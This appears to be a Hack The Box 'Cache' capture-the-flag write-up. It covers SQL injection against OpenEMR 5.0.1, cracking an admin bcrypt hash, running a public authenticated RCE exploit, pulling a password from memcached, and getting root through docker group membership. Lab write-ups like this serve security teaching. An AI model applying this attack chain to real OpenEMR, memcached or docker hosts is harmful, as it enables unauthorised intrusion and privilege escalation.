HTB Cache Write-Up
User Flag
Result of nmap scan:
1 | PORT STATE SERVICE VERSION |
Heading to the IP address in the browser reveals a website looking static and old. The login page however references an unusually named script /jquery/functionality.js. Opening it reveals the only working credentials in the login form is ash:H@v3_fun. But the page behind it is under construction with a nice picture of Ace from One Piece.
Further exploration in the Author page shows:
ASH is a Security Researcher (Threat Research Labs), Security Engineer. Hacker, Penetration Tester and Security blogger. He is Editor-in-Chief, Author & Creator of Cache. Check out his other projects like Cache:
HMS (Hospital Management System)
So if we are exploring cache.htb and it says that there is HMS which is like cache so can it be a hms.htb ?!
Add that to the /etc/hosts file and we got a login page. It seems apparently it’s a CMS called OpenEMR. When facing a CMS, I don’t directly go for gobuster since their structure can be found directly where the CMS is available like Github and you can even find listed vulnerabilities.
Found OpenEMR on Github but the robots.txt does not mention the version. Their is a admin.php in the root folder and http://hms.htb/admin.php reveals the version used is 5.0.1 (3). Still from Github, switch to the appropriate tag from that version in order to see the source code which is deployed at HMS.
Now for vulnerability hunting, searchsploit reveals a RCE for our version but we need to get authenticated. A Google search ended with a PDF containing a ton of vulnerabilites. Follow the instructions necessary to make a SQL injection with the catid GET parameter of /portal/find_appt_popup_user.php. To speed the exfiltration of the users, you will find at the repo the database schema and the target table is called users_secure.
Successful SQLMap exploitation gives the credentials openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. This being a Bcrypt hash, pass it to john or hashcat and it will come as being xxxxxx (what a dumb password for an admin, lol).
Now we are authenticated, time to use the exploit we found with searchsploit.
1 | $ searchsploit -m php/webapps/45161.py |
And you have a shell !
The user flag is owned and readable only by ash but we do have a password for ash found in the cache JS script. Let’s try that:
1 | $ python3 -c 'import pty; pty.spawn("/bin/bash")' # Spawn TTY shell |
Voilà!
Root Flag
Ash can’t sudo in the box so we used the famous linpeas script to check for possible things we can exploit.
In the process list, I spotted
1 | memcache 1098 0.0 0.1 425792 4052 ? Ssl 13:30 0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memc |
Memcache is running at 11211, so let’s try to see what informations it can give us.
1 | ash@cache:~$ telnet localhost 11211 |
And we got 0n3_p1ec3 ! That is sure to be the password of user luffy (I’m a BIG fan of One Piece by the way).
Now lateral movement is done and luffy can’t sudo too, let’s use again linpeas. The first ouputs reveal luffy is a member of the docker group.
1 | User & Groups: uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker) |
This means we can run docker commands like deploy containers. The Privilege escalation became clear. We need to deploy an interactive container and mount the host filesystem as a volume in the container and like we will be root in the container, we will be root of the mounted volume which is the current box. Let’s first check if there is any image in the box we can use for that because if not, we will have to set a docker repository from our machine, host a useful image in it and make the box pull it.
1 | luffy@cache:~$ docker image ls |
Congratulations, you just rooted the box.